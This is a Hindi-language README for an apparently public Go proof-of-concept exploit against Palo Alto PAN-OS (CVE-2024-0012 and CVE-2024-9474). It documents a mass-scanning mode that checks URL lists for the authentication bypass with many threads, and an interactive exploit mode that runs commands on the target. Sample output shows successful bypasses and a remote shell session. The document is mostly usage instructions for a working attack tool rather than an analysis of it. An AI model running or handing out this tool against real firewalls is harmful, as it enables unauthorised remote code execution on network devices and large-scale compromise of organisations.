
Palo Alto RCE भेद्यता
यह स्क्रिप्ट Palo Alto PAN-OS में पाई गई कमजोरियों (CVE-2024-0012 और CVE-2024-9474) के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) एक्सप्लॉइट है। स्क्रिप्ट का उपयोग या तो कमजोरी के लिए URL की सूची को स्कैन करने या किसी एकल कमजोर URL का इंटरैक्टिव रूप से शोषण करने के लिए किया जा सकता है।
git clone https://github.com/aratane/CVE-2024-9474
cd CVE-2024-9474
go mod tidy
github.com/cheggaaa/pb/v3: स्कैनिंग स्थिति प्रदर्शित करने के लिए प्रोग्रेस बार। github.com/gookit/color: कंसोल आउटपुट के लिए उन्नत रंग समर्थन। github.com/manifoldco/promptui: इंटरैक्टिव कमांड-लाइन प्रॉम्प्ट। github.com/p0dalirius/goopts/parser: कमांड-लाइन तर्क पार्सिंग।
स्कैन मोड में चलाना (कई URL स्कैन करने के लिए) स्कैन मोड का उपयोग कमजोरी के लिए कई URL की जाँच करने के लिए किया जाता है। आपको URL की सूची वाली एक फ़ाइल प्रदान करनी होगी।
go run main.go --file urls.txt --output results.txt --threads 100
--file: स्कैन करने के लिए URL की सूची वाली फ़ाइल का पथ। --output: स्कैन परिणाम सहेजने का पथ (डिफ़ॉल्ट: output.txt)। --threads: स्कैनिंग के लिए उपयोग किए जाने वाले समवर्ती थ्रेड्स की संख्या (डिफ़ॉल्ट: 200)।
http://example1.com
http://example2.com
एक्सप्लॉइट मोड में चलाना (एकल URL का इंटरैक्टिव रूप से शोषण करने के लिए)
go run main.go --url http://target.com --output results.txt
--url: शोषण करने के लिए लक्ष्य URL। --output: एक्सप्लॉइट परिणाम सहेजने का पथ। एक्सप्लॉइट मोड में, आप लक्ष्य सिस्टम पर निष्पादित किए जाने वाले कमांड दर्ज कर सकते हैं। इंटरैक्टिव शेल से बाहर निकलने के लिए exit टाइप करें।
सहायता जानकारी प्रदर्शित करने के लिए:
go run main.go --help
स्कैन पूरा होने के बाद, परिणाम निर्दिष्ट आउटपुट फ़ाइल (जैसे, results.txt) में सहेजे जाएँगे:
[+] http://example1.com - Auth Bypass successful
[+] http://example2.com - Auth Bypass successful
किसी URL का इंटरैक्टिव रूप से शोषण करते समय, लक्ष्य पर कमांड निष्पादित करने के बाद कमांड आउटपुट दिखाया जाता है:
# ls /var
bin app lib tmp
# exit
[+] Exiting interactive shell.
कमांड-लाइन तर्क फ़्लैग विवरण डिफ़ॉल्ट मान --url एक्सप्लॉइट मोड में शोषण करने के लिए URL --file स्कैन करने के लिए URL वाली फ़ाइल (स्कैन मोड में उपयोग किया जाता है) --output परिणाम सहेजने के लिए आउटपुट फ़ाइल output.txt --threads स्कैनिंग के लिए समवर्ती थ्रेड्स की संख्या (स्कैन मोड) 200 --help सहायता संदेश दिखाएँ
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।